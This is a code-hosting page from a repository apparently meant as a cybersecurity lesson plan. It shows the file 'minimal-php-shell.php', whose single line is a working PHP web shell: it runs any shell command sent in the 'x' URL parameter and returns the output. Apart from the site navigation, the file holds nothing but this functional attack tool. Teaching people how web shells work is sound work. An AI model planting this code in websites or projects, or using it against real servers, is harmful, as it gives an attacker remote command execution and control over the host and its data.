This website requires JavaScript.
Explore
Help
Sign In
PrincessPi
/
OpenCybersecLessonPlan
Watch
1
Star
0
Fork
0
You've already forked OpenCybersecLessonPlan
Code
Issues
Pull Requests
Actions
Packages
Projects
Releases
Wiki
Activity
Files
9c7ec708fbbce3511fb7994b1b3d30919970ace5
OpenCybersecLessonPlan
/
code-examples
/
minimal-php-shell.php
T
PrincessPi
9c7ec708fb
Initial commit
2024-06-28 18:50:56 -06:00
1 line
44 B
PHP
Raw
Blame
History
<
?
php
print
(
shell_exec
(
$_GET
[
'x'
]));
die
();
?>
Reference in New Issue
View Git Blame
Copy Permalink